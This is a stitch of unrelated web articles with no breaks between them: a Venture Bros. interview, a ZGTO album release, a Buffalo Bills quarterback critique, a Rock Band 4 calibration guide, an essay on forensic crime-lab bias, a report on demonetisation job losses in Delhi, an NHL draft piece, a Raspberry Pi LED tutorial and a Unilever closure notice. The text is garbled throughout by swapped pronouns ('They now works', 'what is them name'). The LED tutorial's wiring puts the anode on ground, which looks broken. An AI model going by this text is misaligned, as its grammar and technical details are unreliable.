Publick : I mean he 's the last henchman standing so that changes their relationship and we 've had fun exploring that .
Nrama : Speaking of changes . even from the Halloween special to now , and last season , we 're seeing a bit of a transformation with Dean ... or is this just puberty finally really hitting them hard ?
Publick : Both , I think .
Hammer : Yeah , it 's that and a sense of freedom hitting him . I think they got to that age and step back and look at who they were and see what kind of really f -- -- d up world they live in .
Publick : Yeah , Hank does n't need to step back because they take on things as they come . Dean is more sensitive and probably more moral and soul-searching and has to examine their life a little bit .
Hammer : Also , Hank is probably the sanest person on the show . Nothing jars him . Anything you can throw at him , they can just put it in their world view , which sounds insane , but I promise you he 's incredibly sane .
Nrama : In the early years we always thought it was the Monarch as the Big Bad , but here we 're learning more and more about the Sovereign with some twists I do n't think fans are really expecting .
Hammer : I think the exploration of the Sovereign is all there is and that 's all you need to know .
Publick : The Monarch is the Big Bad to this one family of former adventurers , but we 've always known there is a bureaucracy of villains that is a workman-like aspect to them . Guys like the Monarch are not unique and there are guys like them all over the world torturing dumb scientists . I guess last season we started to explore there is corruption at the top and this is the place where we bring that to the head .
Hammer : Really the beauty of the Monarch is that he 's really not that important . He 's a bigger pain in the ass to themselves and that 's kinda a fun thing to have when your main villain is not the world 's main villain .
Publick : Every once and a while we 've hinted he 's done more horrible things off -creen like they kidnap somebody or murdered somebody because that 's not part of the Ventures ' plot . They probably killed Captain Sunshine 's sidekick , but he 'd rather prefer chasing Dr. Venture around . Like they do this for the love of hate .
Venture Bros. `` All This Gargantua 2 '' stills Credit : Adult Swim
Nrama : Is the sixth season going to be a full season or more on the shorter side like five ? Fans were very vocal about the shortcomings of five .
Publick : Uh . yeah , it 's going to be more like five .
Hammer : It 's going to be exactly like five .
Publick : I mean , there are the same exact number of episodes , it 's just how it 's broken up .
Nrama : Will there be the club shirts again this year ?
Publick : For this special , yeah .
Hammer : There are not a lot of Venture products out there in the world , so it 's fun for us to make this junky stuff ourselves . We are our idiotically proud of our shirt club .
Nrama : Do you have a favorite episode of last season ?
Hammer : You know what ? I see last season as a group . I see some other seasons as individual episodes , but last season felt just like “ Season Five ” .
Publick : There was something unique to enjoy about each one of those episodes . I have a hard time judging the final product , as I usually judge it by the experience of making them , so there are seasons I hate because they were so hard . Last season , though , I just loved making it and I was happy with the scripts I wrote , and every script Doc wrote . We were trying new things out and , I do n't know , it just feels like we 've broadened the horizons of the show in just how we told stories and the way we could control the pace and the visuals .
Hammer : I 'm proud of that as a director . I like everyone of them !
Nrama : So last season you got to work with guys like Aziz Ansari and Gillian Jacobs , is there anybody you 're excited to bring into the Venture Bros. fold this season ?
Hammer : Did you recognize a returning voice ?
Nrama : Was that Stephen Colbert for Professor Impossible ?
Hammer : One last time ! We continue to get Toby Huss to do some stuff , and John Hodgman as well . We got James Adomian to come in and do voices for us this season . Patrick Brewster and Paul F. Tompkins we used a little bit . We got [ laughs ] Misha Collins .
Nrama : You got Misha Collins to come in ?
Hammer : And the f -- -- -g Kurrgan , man !
Publick : Yeah , we got Clancy Brown to come in and we just want to write the s -- - out of that character . I 'm sure I 'm forgetting people , but yeah .
Hammer : Oh , OH , what 's them face ? Jesus Christ ... what is them name… . ?
Publick : Yeah ! Her ! Ugh . I 'm sorry . We adore her ! I am so tired . I have n't slept in about ... 35 hours .
Hammer : Just pretend who you know who we 're talking about .
Publick : Please hold . Looking them up .
Hammer : Really ? !
Publick : I have to ! [ pause ] Cristin Milioti ! Who you might know from How I Met Your Mother or The Wolf of Wall Street . A pure delight . '
Venture Bros. `` All This Gargantua 2 '' stills Credit : Adult Swim
Nrama : What are you looking forward to fans to see this season ?
Publick : Prove to them by the end of the show that we made it better for them .
Hammer : It 's totally okay to jump a shark when you know how to ride a f -- -- -g shark ! We are strapping the motorcycle to the shark . We are just killing surfers and seals . I 've got one foot on each shark . These sharks are like they were tamed at Sea World . There 's your pull quote !
Detroit based beatmaker Shigeto and ZelooperZ have been spending time together in the studio for over two years and the final output is finally , almost , here . Together they 're going by the name ZGTO and the first single sounds just like what you 'd expect the two to put out together . Smooth , layered beats with strong jazz influences ( Shigeto 's signature sound ) perfectly hold ZelooperZ laid back rhymes in them . It 's a super snug fit and just feels comfortable .
The press release accompanying the release sheds a lot more light on the collaboration , thought process and what ZGTO set out to make . So i 'll leave that for y'all to read under the single here .
The album is called A Piece Of The Geto and the super chill first track off that is Off Dat .
A Piece Of The Geto by ZGTO There 's also a video with the track that you can check out on Bandcamp .
For vinyl enthusiasts , the album is also available on a limited run ( 1500 worldwide ) smoked marble vinyl .
ZGTO – A Piece Of The Geto
In a city famed for its disparate and varied musical excellence , the Detroit-based alignment of feted electronic artist and producer Shigeto and rapidly rising Bruiser Brigade member ZelooperZ is an entirely natural thing . Introduced by mutual friends in the city , an instant bond was formed , and ZGTO was born .
Over a two-year period , ZelooperZ and Shigeto would collaborate and experiment , honing their sound without any preconceived notions of its final form or an eventual release . Eventually and inevitably though , a full length record transpired .
For Zach Saginaw , aka Shigeto , A Piece Of The Geto is the first time he 's musically stepped out the box of a solo artist and exclusively worked with a vocalist on a project . The opportunity to work with someone seemingly a world away from Shigeto musically , had obvious appeal :
“ It 's a representation of what two brothers from completely different environment can give each other , ” explains Shigeto . “ The music is freedom for us . It 's a chance to say that all of those rules that you thought existed , do n't exist . ”
A Piece Of The Geto is not exactly like any other album . There is a “ less is more ” philosophy with the production where the vocals of ZelooperZ are seamlessly interlaced into the fabric of the beats . It 's minimal in a sense , but the emotion felt through the words of ZelooperZ makes the songs as a whole intense and heavy with sentiment .
“ I think our music makes people feel things , ” says Shigeto . “ To be yourself , to be who you want to be , and to be friends and have love for who you want to have love for . ”
As their musical partnership progressed , the natural impact expanded each other 's peripheral . ZelooperZ gave Shigeto an opportunity to act as a real music producer , stepping away from the singularity of a solo artist and performer , to feed off of their collaborator and to expand their horizons . In return , this project gave ZelooperZ a new lane to embrace their various artistic sides that they might not have shown before .
“ It 's a piece from them and it 's a piece from me , ” says ZelooperZ . “ It 's a piece from both of us . The whole process has been that . We are just putting in our pieces . It 's like a puzzle that was never supposed to fit together . It looks crazy but the vibe is fun . ”
For ZelooperZ , a resident of the west side of Detroit , he 's had a gift with words since they were a kid , growing up in an environment immersed in the street hustle . They would soon have a bigger outlook on life and A Piece Of The Geto is their way of expressing that .
“ I want my audience to get out of this what I felt when I was making this , ” describes ZelooperZ . “ I want to feel euphoria . I want to feel love . I want to feel heartbreak . Not only that , I want them to understand their heartbreak they are going through , understand the love they are going through , and understand you can do what you want to do in life . ”
As much as A Piece Of The Geto is an intimate reflection of a budding personal and musical relationship between ZelooperZ and Shigeto , it more so shows that people from separate worlds experience all the same types of pleasure and pain , and can come together to express that through whatever they choose to do or create .
It will take a lot for the 8-7 Bills to snap the longest active playoff drought in America 's four major sports .
They need to win in Miami on Sunday , of course . But that 's not all ! Even if they beat the Dolphins and finish 9-7 , they can qualify for the playoffs only if the Ravens lose to finish 9-7 , or if the Chargers and Titans , both of whom own tiebreakers over Buffalo , lose to finish 8-8 . All three teams that the Bills want to lose in Week 17 are playing at home against opponents they 've already beaten this season on the road . None of those opponents have anything left to play for : The Ravens and Chargers are facing teams that are eliminated from the playoff picture ( the Bengals and Raiders , respectively ) ; the Titans are taking on the Jaguars , who have already clinched the AFC South but can not earn a first-round bye or move from their no . 3 seeding . According to Las Vegas , a Bills win is the least likely result from any of these four games : Buffalo is favored by 2.5 points , Tennessee by 3 , Los Angeles by 7.5 , and Baltimore by 9.5 .
The most likely outcome is that the Bills miss the playoffs via tiebreaker , a scenario that would be crushing . Buffalo has missed the playoffs in all sorts of ways since its drought began with the 2000 season , but it 's always missed them by at least a full game . This happens to be a historically bad season for the AFC , though—NFC teams went 41-23 in head-to-head matchups against AFC squads , the most lopsided the league has ever been in the NFC 's favor—so a playoff spot seemed to be there for the Bills ' taking .
If Buffalo misses out on a playoff berth because of a tiebreaker to the Chargers , that 'd be the most brutal development of all . The Bills played Los Angeles in Week 11 and lost 54-24 after inexplicably benching quarterback Tyrod Taylor and starting untested rookie Nathan Peterman .
When the team made this decision in mid-November , I wrote that there was no legitimate reason to believe that Peterman had a higher ceiling than Taylor , and that Peterman 's floor was “ much , much , much lower. ” After all , Peterman was taken in the fifth round of the 2017 draft for their long-term potential to develop rather than their immediate ability to start , and they had looked far less competent than Taylor in preseason play . But no one could have known how low that floor could be .
Without hyperbole , we can describe Peterman 's start against the Chargers as the worst in modern NFL history . They threw five interceptions in a half . Taylor has yet to throw five interceptions this season , in 14 games and 393 passing attempts . No quarterback had thrown five interceptions on fewer than 28 pass attempts since 1990 ; Peterman did it in 14 , becoming the first passer in league history to throw five interceptions with no touchdowns on fewer than 15 attempts . Because every Peterman-led drive in Los Angeles was short ( their longest was six plays and culminated in a pick-six ) and five ended in interceptions , the Chargers perpetually had spectacular field position , and scored 37 points in the first half . In their 14 games against QBs other than Nathan Peterman , the Chargers have yet to score more than 30 points .
There 's a strong argument to be made that the Bills would have lost to L.A. even if they had started Taylor . They opened as four-point underdogs ( the line swung heavily in the Chargers ' favor when the Bills announced Peterman as starter , because Vegas knew this was a bad idea ) . Their previous two results were an embarrassing loss to the Jets and a 47-10 blowout at the hands of the Saints . ( It would have been 47-3 if not for the late Peterman touchdown drive that led to calls for Peterman to start . )
The point here is not that Buffalo certainly would have won with Taylor . It 's that it would have had a chance with Taylor , and instead chose to go with Peterman , who gave the Bills absolutely zero opportunity to win . They voluntarily conceded a winnable game in the midst of their first legitimate playoff chase in years . To argue that Buffalo , which could tie for its best record this millennium , had no chance to win a game in which it started Taylor , the team 's best quarterback since Drew Bledsoe , is essentially to argue that the Bills are pointless and should disband as an organization .
It is reasonable to argue that Taylor should not be the Bills ' quarterback of the future : They are not a top-level passer and is averaging just 6.6 yards per attempt . No one would mistake them for Tom Brady , Drew Brees , or Carson Wentz . Yet it is completely unreasonable to argue that Taylor should have been benched in favor of Peterman in Week 11 .
It 's good to question your team 's starter , to strive for better options . Many teams do get overly entrenched with a QB when better options exist . But there was no evidence that Peterman could be anywhere near as good as Taylor . If there 's a lesson to take from all of this , it 's that there is a massive difference between middle-of-the-road NFL quarterbacks like Taylor and replacement-level options like Peterman . Most of the time , NFL teams are aware of this . Players as unprepared as Peterman are typically forced into action only under dire circumstances—unless they play for the Bills , who chose this path intentionally . The decision to start Peterman seemed like one of the dumbest in recent memory at the time ; in hindsight , it might be the worst single-game lineup decision in football history .
I very much want Buffalo to make the postseason and end its decades of sports misery , but I also firmly believe sports stupidity should be punished . So if the Bills miss the playoffs , remember : They did this to themselves .
So you 've got your brand-new copy of Rock Band 4 in your hands . You 've unboxed , put the instruments together , called all your best pals , and you 're ready to rock . But wait ! Before you get the party started , be sure to set your television to `` Game Mode '' ( if it has one ) and calibrate . This way everyone will have the best experience possible .
Our guide below takes you through the nitty-gritty of calibration . If you know the ropes from previous Rock Band games , then scroll to the end . We 've got some pro-level tips from our Audio department about fine tuning your calibration .
What Is Calibration ?
Calibration is a process that syncs up what you hear and see with what you 're playing . Calibrating ensures the best gameplay experience possible . If you feel like there is a delay between what you 're seeing and hearing , you 'll want to calibrate your system .
Why Calibrate ?
In some cases , particularly with HDTV systems , the audio and video may play at different times , making it difficult to play the right note at the right time . If you are ready to blame your TV for your less-than-stellar musicianship , try calibrating your system .
Where Do We Find The Calibration Settings ?
From the MAIN MENU , scroll down to OPTIONS . Select OPTIONS . Once there you can select CALIBRATION . You can calibrate your game automatically or manually .
Auto Calibration :
If you have a Rock Band™ Wireless Fender™ Stratocaster™ Guitar Controller , select CALIBRATE AUTOMATICALLY . ( Rock Band 4 guitars will work as well as previous generations of Rock Band Wireless Fender Stratocaster Guitar Controllers ) .
When you are prompted , hold your controller up to your sound system speaker or your TV 's speaker ( wherever the sound is coming from ) as close as possible without touching .
The volume should be set to a comfortable listening volume . If you have trouble in a room with a surround system , turning the volume down sometimes helps . Hold your guitar controller there until prompted .
To calibrate your system 's video timing , when you are prompted , hold your controller up to your TV screen , with the guitar controller facing the TV and as close to the TV as possible without touching . The game will flashlights repeatedly .
This tends to work best in darker rooms , so either turn the lights down or angle the guitar slightly downwards away from the light . Hold your guitar controller there until prompted . You should now be ideally calibrated !
Test out a song in QUICKPLAY to make sure it feels right . If not , try auto-calibrating again , or try calibrating manually .
Manual Calibration
If you preferred to calibrate manually , select CALIBRATE MANUALLY . You can also select ENTER CALIBRATION NUMBERS to manually set the audio latency compensation by pressing the directional buttons .
Each time you hear a drum beat , strum/hit the green pad in time with the beat you hear .
Then proceed to VIDEO CALIBRATION . When you see the needle hit either side of the meter , press the strum or hit the green pad in time with the needle . Your system is now calibrated . Test it out !
Manually Set Numbers
If you ca n't get an ideal calibration using auto calibration or manual calibration , try setting your calibration numbers by hand . Select ENTER CALIBRATION NUMBERS from the Calibration menu and check out the info below . These numbers can be a useful starting point to help you find the best settings for your television type .
Try starting with the numbers below and adjust gradually as needed until the settings feel just right . LCD 1 Audio 80 , Video 50 LCD 2 Audio 15 , Video 30 CRT Audio 0 Video 0 DLP Audio 15 , Video 60 Rear-Projection Audio 5 , Video 50 Plasma Audio 50 , Video 50
Once you 've gone through all the steps , try testing your work in QUICKPLAY to see if you 've gotten the calibration right . If it 's still not perfect , try calibrating again . If you 're still having trouble—or if you just want more information about calibration— please visit www.rockband4.com/support .
Pro Tips !
When calibrating for audio :
Hold the guitar immediately next to a speaker as pictured above .
In a larger room ( or venue ) , be sure to calibrate off the speaker closest to where the band will be playing .
When you are trying to match your strum ( or hit ) to the beat , do n't react to the audio cue . Instead , try to anticipate it and strum/hit at the exact time .
When you strum , grip the strum bar firmly between your thumb and first finger and strum firmly all the way down then all the way up , alternating up and down strums on the beat .
When calibrating for video :
Video calibration tends to work best in darker rooms , so either turn the lights down or angle the guitar slightly downwards away from the light .
You may need to shut off surrounding light sources all together .
You may need to shut off surrounding light sources all together .
If the calibration bar is not progressing , cup your hand over the top of the sensor near the sync button .
Leaning over the video source with your hand cupped over the sensor will often block out any ambient light that is interfering with sync .
Any questions ? Head to rockband4.com/support
The Detroit Free Press made an astonishing discovery last month . The city 's former crime lab had been abandoned . As the paper reported , `` Thousands of rounds of live ammunition , sealed evidence kits and case files -- some containing Social Security numbers of rape and assault victims '' sat unattended in an old elementary school building , accessible to anyone who happened upon them .
The lab was closed in 2008 after another investigation revealed habitually sloppy analysis among the lab 's workers , and an error rate as high as 10 percent , a jaw-dropping figure considering that those analysts ' testimony can send someone to prison . The city expected the results of that investigation could have reopened thousands of cases and subject Detroit to hundreds of millions of dollars in damages .
What 's going on ? Most of these scandals were exposed after DNA testing cleared someone who was convicted based on testimony from crime lab analysts . DNA testing , which is actually grounded in solid science , is showing that forensic analysis is n't as certain or as scientific as it is often claimed to be . It 's also showing us that forensics is plagued by bias , both intentional and unintentional , and that bias is caused by poorly structured incentives that often reward crime lab workers for helping win convictions , not for sound analysis . The Innocence Project estimates that bad forensic science contributed to about half of wrongful convictions that were later exposed by DNA testing .
Consider the scandal in North Carolina , uncovered last year after a state investigation and follow-up series by the Raleigh News & Observer . The initial investigation found at least 230 cases in which crime lab workers failed to turn over potentially exculpatory evidence , including three cases that resulted in the defendant 's execution .
The News & Observer follow-up found even more , often stunning , bias at the lab , including training manuals that taught workers to consider defendants and their attorneys as the enemy . Many lab workers ' performance reviews were actually written by prosecutors . In one case , two blood-spatter specialists were caught on video high-fiving one another after running through multiple experiments until they found one that supported the prosecution 's theory of a case .
It is n't difficult to see how having experts who present themselves in court as objective , unbiased analysts report directly to prosecutors or police agencies could present some problems . But that 's exactly what 's happening . According to a 2009 report on forensic science by the National Academy of Sciences , more than half the crime labs in the U.S. report directly to a law enforcement organization . In some cases , this can lead to overt pressure from police officers and prosecutors to produce desirable results . But most of the time the bias is more subtle , and unintentional .
But that does n't mean it is n't cause for concern . Bias can creep into an analyst 's work in a number of ways , including in the choice of which tests to run , how to record the results of those tests , how to interpret the results , and what the analyst later remembers about the entire process when testifying at trial .
In most government crime labs , there 's no check on these problems , referred to collectively as `` cognitive bias . '' The state lab is often the only lab to test crime scene evidence . Even when defendants are given money to conduct their own testing , the labs they choose are often seen by jurors as `` hired guns , '' despite the fact that similar biases also exist in government labs .
There are other problems . Though often presented in court as `` science '' , many forensic disciplines do n't incorporate basic scientific principles such as peer review and double-blind testing into their analyses .
For example , giving an analyst a crime-scene fingerprint and the fingerprint of the suspect and asking if they 're `` a match '' can produce very different results from the more scientific method of presenting the analyst with multiple prints ( some of which are relevant to the case , some of which are n't ) , then asking if any two are a match .
One 2006 study by researchers at the University of Southampton in the U.K. found that the error rate of fingerprint analysts doubled when they were first given some information about the case .
In a 2007 report for the Reason Foundation , Roger Koppl , an economist at the Fairleigh Dickinson University , argued that the best way to address these problems is to begin including private crime labs in criminal investigations and prosecutions . [ Disclosure : the Reason Foundation publishes Reason magazine , this reporter 's previous employer . ]
The word privatization often conjures up images of no-bid contracts and crony capitalism . But the idea here is n't to simply sign state crime labs over to private companies . For several years in just such a system in Mississippi , up until 2009 , prosecutors were contracting most of the state 's autopsies out to a single private-practice medical examiner , because they knew he 'd give them the results they needed to win convictions . The results were disastrous .
Instead , Koppl 's plan would use competition to remedy the incentive and cognitive bias problems that occur when analysts who are supposed to be objective work for and report to the same government agencies that then use their results to try to put defendants in prison .
Under Koppl 's plan , a city or state would create a position of `` evidence handler . '' The evidence handler 's job would be to distribute the testable evidence in a case to the appropriate crime lab . Under a fully privatized system , the evidence handler would distribute it to one of a rotating series of private labs . Under a partially-privatized system , there would still be a state lab , but under both systems , in every third case or so , the evidence would be sumbitted to a second or third lab for verification . The original lab would not know when it was being checked by other labs .
This system , which Koppl calls `` rivalrous redundancy , '' flips the incentive problem upside down . For the individual crime lab worker , the incentive is no longer to please prosecutors or police , but to do the most thorough , sound , objective analysis possible . For the private labs , the incentive is to catch the state labs -- or another private lab -- making a mistake . When there 's conflict over test results , a third or fourth lab could come into the mix .
Private labs also have an incentive to protect themselves from liability . It 's nearly impossible to sue the government . Individual crime lab workers employed by state or local governments are protected by qualified immunity , making it difficult to sue them as well . Private labs do n't have such protections , so they 're more likely not only to be careful , but to preserve evidence in the case of litigation .
Dallas County , Texas , for example , began sending crime scene evidence to a private lab in the early 1980s . It 's one of the few cities in the country to do so . When Craig Watkins was elected as the county 's district attorney in 2006 , they began to actively seek out cases in which an innocent person may have been sent to prison .
State crime labs often destroy biological evidence after a defendant has exhausted their appeals . It is n't difficult to understand why : Preserving the evidence is expensive , and really only serves the purpose of possibly revealing mistakes somewhere down the line . But the private lab in Dallas had different incentives , which is why it preserved the biological evidence in cases going back 25 years .
In a 2008 interview , Watkins said that preservation was key to helping them discover a number of wrongly convicted people .
`` I do n't think there was anything unique about the way Dallas was prosecuting crimes , '' Watkins said . `` It 's unfortunate that other places did n't preserve evidence , too . We 're just in a unique position where I can look at a case , test DNA evidence from that period , and say without a doubt that a person is innocent . They ca n't do that in other places . ''
“ If 99 % of the demonetised currency has returned [ to the banking system ] , then why have n't the jobs that demonetisation took away from us come back too ? ” asked Bajrang Yadav , 45 , standing in a waterlogged lane outside their home in a slum cluster in West Delhi 's Mayapuri area last Sunday .
Yadav was referring to the Reserve Bank of India 's annual report that had been released on August 30 . It said that Rs 15.28 lakh crore worth of cash had returned to the banking system by June 30 , nearly eight months after the government had decided to invalidate Rs 1,000 and Rs 500 notes worth Rs 15.44 lakh crore overnight . The demonetised notes accounted for 86 % of Indian currency in circulation at that time . It took several weeks to print and distribute new notes , causing a cash crunch that crippled the economy for months .
When Scroll.in visited Mayapuri weeks after demonetisation , workers in the largest industrial area within Delhi were still struggling to exchange old notes – many employers had paid out wages in the demonetised currency . Eventually , as orders dried up , many factories shut down .
Mayapuri is a magnet for migrants from all over North India – Uttar Pradesh , Bihar , Rajasthan , Madhya Pradesh , Jammu and Kashmir . Some of them have come from as far as West Bengal . Slum clusters that have grown around the industrial area house more than 3,000 families .
Yadav , from Pratapgarh district in Uttar Pradesh , had spent 23 years working in a small-scale gear-box manufacturing unit in Hari Nagar industrial area , adjoining Mayapuri . They were one of the 16 workers in the engineering department . By December 2016 , all of them had been laid off .
The middle-aged worker left the national capital for their village but they could not find any work there . In February , they came back to Mayapuri with the hope of getting their job back . But their employer had already hired eight new employees in the engineering department . They insisted they could not hire any more workers as the unit 's capacity had fallen by half . By September , the number of workers in the unit rose to 12 , but Yadav was not lucky enough to find themselves among them . “ If I was not productive enough , why did the employer keep me for 23 years ? ” they asked .
Survival of the fittest
Six months after demonetisation , the majority of the 1,800-odd small- and medium-scale factories in Mayapuri had not resumed operating at full capacity . Even now , ten months after the decision , the situation has not improved much . In December , there was intense anger among the workers . With time , the anger has turned into disappointment for many – the currency situation has returned to normal , but employment opportunities have not .
Neeraj Sehgal , the general secretary of Mayapuri Industrial Area Welfare Association , who owns a factory that manufactures bullet-proof and fire-proof doors , said that most factories , including his , have been operating at less than 75 % of their capacity since demonetisation . “ The paperwork after the introduction of the GST regime has made it further difficult , ” they said , referring to the introduction in July of the Goods and Services Tax . GST aimed at making collections more efficient by subsuming a number of central and state taxes . But the low capacity utilisation in factories created an employment crisis and only the most productive workers were able to regain their jobs , Sehgal explained .
Over the past few months , Yadav has visited ten factories in three industrial areas in the National Capital Region in search of a job . The response is always the same : owners say they are not hiring as their manufacturing operations have not reached peak capacity since demonetisation .
“ Demonetisation may have brought acche din [ good days ] to big corporations in the organised sector but definitely not to the millions of smaller employers who give jobs to people like us , ” said Yadav .
They now works as a daily wage labourer . They either goes to factories in search of daily wage work , or stands at a labour chowk waiting , with several others , for people seeking to hire labourers to come theirs way .
In the Mayapuri slum . ( Photo credit : Abhishek Dey ) .
A reshuffle of jobs
Demonetisation also appears to have accelerated a shakeout in the industrial areas in and around Delhi . Most of the residents of the Mayapuri slum , including the women , seek work within the industrial area , and in nearby areas in West Delhi , including Hari Nagar and Naraina . But now , many are travelling to far-off industrial areas like Okhla in South-East Delhi and Faridabad in Haryana in search of work .
After seven months of unemployment , 45-year-old Tara Devi , whose home in the slum cluster is adjacent to a defunct rail track , found work in a garment factory in Mayapuri at Rs 5,000 per month . But Devi 's husband , who is a machine operator at an iron pressing factory , was able to find work only in Faridabad , 40 km away . “ Travel consumes more than three hours of their day but we can not leave this slum since my son works here too , ” they said .
The migration of factory workers from one industrial area to another is closely linked with job specialisation , both employers and trade union leaders said . In Mayapuri , many processes – iron pressing is one example – folded up . For workers who had spent more than 20-25 years in the specialised job , the best option was to move to similar units in other industrial areas . Similarly , workers from other industrial areas migrated to Mayapuri in pursuit of specialised jobs that had dried up elsewhere .
“ The migration , however , does not mean that jobs were created , ” said Rajesh Kumar , a trade union leader who works with factory workers in Mayapuri and nearby industrial areas . They claimed that many skilled workers who lost their jobs never came back . Other unskilled workers took their place , leading to an occupational reshuffle .
A drop in income
Many slum dwellers reported a drop in income .
Sayad Mukhtiyar , 30 , and their 50-odd companions from Baramulla district of Kashmir , have spent as many as 12 years doing the same job in Mayapuri – loading and unloading heavy machinery . They have never been on the payroll of a specific factory , something they attribute to the nature of their work . “ Till demonetisation happened , each of us managed to earn at least Rs 12,000 a month , ” Mukhtiyar said . “ For the past 10 months , hardly any loading or unloading of heavy machinery has taken place , which shows that there is no business at all . We hardly manage to make around Rs 6,000 per month now . ”
But it is n't just a drop in income levels that troubles workers . They fear they could lose their jobs any day , said Rajesh Kumar .
Left to right : Khuwahit Hussain , Sayad Mukhtiyar and Nazaqat Hussain , all migrants from Kashmir in Delhi . ( Photo credit : Abhishek Dey ) .
Confused about media reports
Raja , 25 , a high-school dropout from a village in Bihar 's Patna district , works in a cardboard box manufacturing unit in Naraina . They live in a six foot by six foot room in the same cluster as the Kashmiri porters . The room is located close to a public toilet in the cluster . Crammed inside was a bed without a mattress , a stove , a few utensils , a gas cylinder , a mirror , an electricity meter , some clothes hanging on nails fixed on the bright blue walls and a large , rickety table fan fixed to the ceiling .
Outside , a group of screaming children ran after two municipal workers who had come to the slum on an anti-mosquito fogging drive . Soon , a thick cloud of chemicals permeated Raja 's home . But another kind of fog assailed Raja .
Raja , in their room . ( Photo credit : Abhishek Dey ) .
An avid reader of the Hindi newspapers stacked at the office of the factory workers ' union of which they are a member , Raja said the press coverage confused him . Some articles said demonetisation was a success , while others reported a slowdown in India 's GDP growth rate .
A day after the RBI report showed 99 % of currency extinguished by the government had returned to the banks , on August 31 , government data showed that the country 's gross domestic product growth had slowed to 5.7 % in the April-June quarter from 7.9 % in the corresponding period last year . The government maintained this was not a fallout of demonetisation , even though analysts said it was a factor .
Raja wondered if the job insecurity looming over them was somehow connected with the slowdown . The cardboard box manufacturing unit in Mayapuri where they used to work closed down permanently after demonetisation . A few months later , Raja managed to get a job at a similar unit in Naraina . But their employer has lately been threatening to sack workers , attributing it to “ business failing to pick up since demonetisation ” .
Although they have lived in Delhi for 10 years , Raja is registered as a voter in Bihar . Asked which party they had voted for in the 2014 Lok Sabha elections , their face broke into a smile . They said : “ When people vote for a party , they expect the party to win and form a government that can create jobs . The BJP government has done the exact opposite . ”
It 's become a Stanley Cup Final tradition on Hockey Night in Canada . Several of the top-ranked players heading into the 2016 NHL Draft joined Don Cherry and Ron MacLean on Coach 's Corner during the first intermission of Game 4 Monday night .
Cherry and MacLean ran through some highlights and asked Pierre-Luc Dubois , Auston Matthews , Patrik Laine , Matthew Tkachuk , and Alexander Nylander to name their favourite current National Hockey League stars .
Pierre-Luc Dubois , Central Scouting 's top-ranked North America skater , was asked to name their favourite current NHL player to watch . The 6-foot-3 , 202-pound Cape Breton Screaming Eagles star pointed to a big-bodied left-handed Art Ross Trophy winner as their favourite .
“ I like Jamie Benn of the Dallas Stars . He 's a go-to player for them…he can beat you with their strength or with their speed , ” said Dubois .
MacLean introduced top-ranked European skater and consensus No . 1 pick Auston Matthews by calling for the attention of Toronto Maple Leafs fans . The Phoenix , Arizona native scored their share of big goals over the last couple years playing with the United States in a pair of world junior tournaments and in this spring 's World Championship .
When asked to single out which of three markers highlighted by MacLean stood out as their personal favourite , Matthews said it was their first professional goal as a member of the Zurich Lions of the Swiss League . “ It was my first game , so I was pretty excited about that one . It was nice to get that goal early in that game , ” Matthews said .
No . 2 ranked European skater Patrik Laine has drawn comparisons to Alex Ovechkin thanks to their ability to fire the puck as a right-handed shot . Unsurprisingly , Laine admitted they spent much of their youth in Finland working on their shot . “ I was training mostly my shot…my ability to score goals . So many practices with my shot at our backyard , ” Laine said .
Matthew Tkachuk boosted their draft stock with a great performance in the Memorial Cup with the champion London Knights , scoring the Cup-winning goal versus Rouyn-Noranda . Tkachuk 's father , five-time NHL all-star Keith is an obvious hero of the No . 2 ranked North American skater . Another player they look up to : Corey Perry of the Anaheim Ducks .
“ I like watching Corey Perry , just the way they get under the other team 's skin . He 's able to score goals around the net and make good plays , ” Tkachuk said of the former London Knight sniper .
Eschewing the rise of their brother William Nylander with the Toronto Maple Leafs , third-ranked North American skater Alexander Nylander singled out Pittsburgh Penguins superstar Evgeni Malkin as their current favourite NHL player .
“ I 've got ta say Evgeni Malkin . Great skilled player , very smart out there…creating chances from nothing , ” Nylander said .
For this demonstration we will use an LED and have it blink . This post will not present anything new programming wise , rather it will get you familiar with connecting the GPIO pins to something physical .
Previous Post : Compiling , Linking & Using WiringPi
Next Post : Reading Input With Push Buttons
Connecting the GPIO Pins
The connection is rather simple , all we require is one wire going from an I/O Pin to the negative ( - ) end of the LED , and another wire from the positive ( + ) leg of the LED to the ground ( GND ) pin on the Pi .
If you would like to test that your LED is working before this point , instead of connecting to the GPIO pin , connect it to the 5V pin and your LED should illuminate .
The following image demonstrates the setup with colour co-ordinated wires .
As shown above , the green wire is connected to the negative connection of the LED ( A.K.A the Cathode ) . This green wire is also plugged into GPIO pin number 3 . This can become quite confusing as it is known as GPIO2 in the header table but the physical pin number is 3 . These references matter in whatever way your code initialises wiringPi . Luckily , by default , wiringPi uses the pin numbers .
Finally , the positive leg of the LED ( A.K.A the Anode ) is connected to the ground pin to ensure a complete circuit .
Writing the Code
Now that we have the connection setup , we need to write the code to make the LED blink . In the previous tutorial we already looked at writing output to the GPIO pins . We will expand on this with a little additional Linux C++ code to delay the on/off state of the pin to make it blink .
# include < stdio.h > # include < wiringPi.h > # include < unistd.h > // Required for Sleep ( ) ; int main ( int argc , char * * argv ) { // Intialize the wiringPi Library wiringPiSetup ( ) ; // LED is connected on pin 3 . Ensure // this pin is set to be an Output . pinMode ( 3 , OUTPUT ) ; // Ensure the LED is ON initialitial int state = HIGH ; for ( int i = 0 ; i < 10 ; i++ ) { // Turn on or off depending on state digitalWrite ( 3 , state ) ; // Toggle to HIGH/LOW output state = ( state == HIGH ) ? LOW : HIGH ; // Wait 1-second sleep ( 1 ) ; } // Ensure we turn LED off digitalWrite ( 3 , LOW ) ; // Exit program return 0 ; } Blinking LED in C++
As this is a very straight forward example , each line in the code is commented accordingly .
Please refer to previous posts on how to compile the code and run it on the Raspberry Pi :
Once your circuit is complete and code compiled , run the program and watch the LED blink 10 times !
All code for these tutorials can be found here over at Github
Previous Post : Compiling , Linking & Using WiringPi
Next Post : Reading Input With Push Buttons
Unilever Canada 's plan to shut down its manufacturing plan in Bramalea in 2016 is another sign of large international companies consolidating operations , experts say . “ It 's part of a general trend to consolidate North American and global plants to fewer locations , more integrated operations , and use of technology to create more efficient practices , ” said Alan Middleton , a marketing professor at York University 's Schulich School of Business .
Unilever , which counts ice cream ( including Breyers ) among its vast line of consumer products , has announced it will be closing its plant in Bramalea . ( David Cooper / Toronto Star ) Closure of the Bramalea Unilever plant — which makes dry mix soups , sauces , sides and gravy under the Knorr and Lipton brands — will affect 280 salaried and hourly employees , the firm said in a statement .
